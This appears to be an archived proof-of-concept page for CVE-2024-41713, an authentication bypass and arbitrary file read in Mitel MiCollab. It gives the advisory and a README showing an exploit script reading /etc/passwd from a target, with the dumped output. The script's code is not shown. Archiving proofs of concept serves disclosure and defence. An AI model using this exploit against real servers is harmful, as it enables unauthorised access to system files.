Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-41713 PoC — Mitel MiCollab 安全漏洞

Source
Associated Vulnerability
Title:Mitel MiCollab 安全漏洞 (CVE-2024-41713)
Description:Mitel MiCollab是加拿大敏迪(Mitel)公司的一款为员工提供语音、视频、消息、音频会议和团队协作的移动应用程序。 Mitel MiCollab 9.8 SP1 FP2(9.8.1.201)版本及之前版本存在安全漏洞,该漏洞源于对输入验证不足。攻击者利用该漏洞可以查看、破坏或删除用户的数据和系统配置。
Description
Mitel MiCollab Authentication Bypass to Arbitrary File Read
Readme
# CVE-2024-41713-PoC-exploit
Mitel MiCollab Authentication Bypass to Arbitrary File Read

```
❯ ./cve-2024-41713-exploit.sh
[*] Exploiting CVE-2024-41713 to read /etc/passwd ...

[+] Extracted users from /etc/passwd:
root
bin
daemon
adm
lp
mail
operator
games
ftp
nobody
```

```
❯ cat debug_response.txt
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
```
File Snapshot

[4.0K] /data/pocs/db1b25f7a5fd9cca38344071bb452c9a8cb69162 ├── [1.4K] cve-2024-41713-exploit.sh └── [ 716] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.